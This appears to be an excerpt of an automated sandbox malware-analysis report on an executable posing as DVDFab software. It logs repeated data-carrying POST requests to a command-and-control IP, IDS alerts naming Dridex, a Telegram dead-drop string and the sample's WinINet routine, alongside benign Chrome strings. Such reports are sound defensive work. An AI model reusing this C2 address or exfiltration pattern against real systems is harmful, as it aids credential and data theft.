Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----47q16x47glfkfusjeuasHost: 95.217.30.53Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----kn7q1vs2ny5x47y5pzmgHost: 95.217.30.53Content-Length: 99109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----58glx4o8qq1dje3ec2n7Host: 95.217.30.53Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----h4o8gv3ozmozmymg4wtrHost: 95.217.30.53Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49732 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49725 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49729 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49734 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49736 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49730 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49737 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49728 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49735 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49766 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49738 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49767 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49768 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49772 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49769 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49770 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49765 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49771 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49773 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49774 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49775 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49777 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49776 -> 95.217.30.53:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49778 -> 95.217.30.53:443

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.30.53

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: 0_3_02D42690 lstrlen,StrCmpCA,InternetOpenA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,GetProcessHeap,RtlAllocateHeap,memcpy,lstrlen,memcpy,lstrlen,memcpy,lstrlen,HttpSendRequestA,Sleep,HttpQueryInfoA,InternetReadFile,InternetReadFile,StrCmpCA,InternetCloseHandle,InternetCloseHandle,

0_3_02D42690

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 95.217.30.53Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJOhywEInP7MAQiFoM0BCL7VzgEIgNbOAQjI3M4BCIrgzgEIruTOAQiL5c4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJOhywEInP7MAQiFoM0BCL7VzgEIgNbOAQjI3M4BCIrgzgEIruTOAQiL5c4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJOhywEInP7MAQiFoM0BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000003.1394215546.00001ECC03798000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3\|\|(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 00000008.00000003.1394215546.00001ECC03798000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3\|\|(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.1473322628.00001ECC0261C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----f3ohlfuk6f3e3ectri5fHost: 95.217.30.53Content-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000008.00000002.1474315925.00001ECC02A15000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: chrome.exe, 00000008.00000002.1472080608.00001ECC022E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
Source: chrome.exe, 00000008.00000003.1390000033.00001ECC032D0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476891441.00001ECC032D0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417772160.00001ECC032CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
Source: chrome.exe, 00000008.00000002.1471945399.00001ECC02296000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: chrome.exe, 00000008.00000002.1476208153.00001ECC03068000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: chrome.exe, 00000008.00000002.1476022271.00001ECC02FD8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: chromecache_71.9.dr	String found in binary or memory: http://www.broofa.com
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://www.dvdfab.cn/?s=playerfab&v=
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://www.dvdfab.cn/bad_package.htm?s=
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://www.dvdfab.cn/bad_package.htm?s=22DVDFab2622
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://www.dvdfab.cn/dvdfab-user-license-agreement.htm?s=playerfab&ad=playerfab_client&v=
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://www.dvdfab.cn/u-experience?s=playerfab&ad=playerfab_client&v=
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://www.dvdfab.cn/u-experience?s=playerfab&ad=playerfab_client&v=http://www.dvdfab.cn/dvdfab-user
Source: chrome.exe, 00000008.00000002.1477058236.00001ECC0334C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/update2/response
Source: chrome.exe, 00000008.00000002.1476110867.00001ECC03004000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: Cm2GRjWK1C.exe	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: chrome.exe, 00000008.00000002.1464503636.00000241BDDD2000.00000002.00000001.00040000.00000010.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html
Source: Cm2GRjWK1C.exe, Cm2GRjWK1C.exe, 00000000.00000003.1676784292.0000000003022000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1271718749.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1676587237.0000000003001000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1676539519.0000000002D62000.00000004.00001000.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1300089487.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1285961370.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53
Source: Cm2GRjWK1C.exe, 00000000.00000003.1271718749.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1300135134.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1257462513.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1300089487.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1285961370.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53/
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.0000000001085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53/$
Source: Cm2GRjWK1C.exe, 00000000.00000003.1300135134.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1300089487.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53/)CMA
Source: Cm2GRjWK1C.exe, 00000000.00000003.1300089487.00000000010B0000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53/7
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.0000000001085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53/8
Source: Cm2GRjWK1C.exe, 00000000.00000003.1286006933.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53/?CSA%
Source: Cm2GRjWK1C.exe, 00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53/FCZA$
Source: Cm2GRjWK1C.exe, 00000000.00000003.1271718749.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53/G
Source: Cm2GRjWK1C.exe, 00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53/MC
Source: Cm2GRjWK1C.exe, 00000000.00000003.1271718749.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1286006933.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53/TC
Source: Cm2GRjWK1C.exe, 00000000.00000003.1271718749.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1286006933.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53/zD
Source: Cm2GRjWK1C.exe, 00000000.00000003.1314253795.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53;
Source: Cm2GRjWK1C.exe, 00000000.00000003.1271718749.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1286006933.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1300135134.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1300089487.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53MC
Source: Cm2GRjWK1C.exe, 00000000.00000003.1676784292.0000000003022000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1676587237.0000000003001000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1676539519.0000000002D62000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53hello
Source: Cm2GRjWK1C.exe, 00000000.00000003.1676539519.0000000002D62000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://95.217.30.53hellohttps://t.me/l793oyir7amMozilla/5.0
Source: x4wbi5.0.dr	String found in binary or memory: https://ac.ecosia.org?q=
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000008.00000002.1471856661.00001ECC02214000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
